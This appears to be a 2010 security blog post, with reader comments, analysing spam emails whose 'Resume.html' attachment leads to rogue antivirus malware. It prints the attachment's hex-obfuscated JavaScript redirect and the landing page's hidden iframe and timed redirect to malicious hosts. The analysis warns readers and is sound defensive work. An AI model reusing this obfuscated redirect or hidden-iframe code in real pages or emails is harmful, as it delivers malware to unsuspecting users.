Resume emails with attached file Resume.html leads to rogue AV software
August 19, 2010 5 Comments
MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:
Attached, please find
The attached HTML file contains the following code:
<SCRIPT LANGUAGE=”Javascript”><!–//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)}runit()//–></script>
When opening the attached HTML file you are directed to a web site witht he following code:
PLEASE WAITING 4 SECOND... <meta http-equiv="refresh" content="4; url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24"> </head><body> <iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>
After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.
It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:
Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe
How do you remove this? We had several people open this file yesterday. Malwarebytes does not detect it.
Get in contact with Malwarebytes and try to give them a sample of the malware. Perhaps they can update their software with a procedure to remove the malware. Or post your problems on the forum of Malwarebytes. In some cases you can get in touch with an expert in virus removals.
You could also try Spybot S&D or Ad-Aware from Lavasoft. The links are on the right side in the Security Tools section.
Search with the help of Google for manual removal instructions.
My recommendation is: backup your data on relevant times and in case of an virus infection, re-install your system. There is always a chance that ‘something’ stays behind. I never trust an computer once it got an infection.
hi i m vist your web site for the first time and i gained knowledge from your web site. your website is great and much informative.. i like most in this is by the time About this indicates that describes visually the concept of information, ie, the set of skills, abilities, behaviors and attitudes that enable the individual to search, access, evaluate and effectively use the most relevant information are every one usefull.I enjoyed my time working for them and I was treated really well. I just happened to google myself and found your website. I am now a big fan. It was so strange to find someone actually cool.
Faisalabad Mera
We keep getting resume’ attachments in .html format . They all have the same text and weird email addresses. I am glad they came in all the sudden as I am afraid to open any attachments now.
Here’s a very good link that provides screenshots for all fake antiviruses,..
http://tusharvartak.com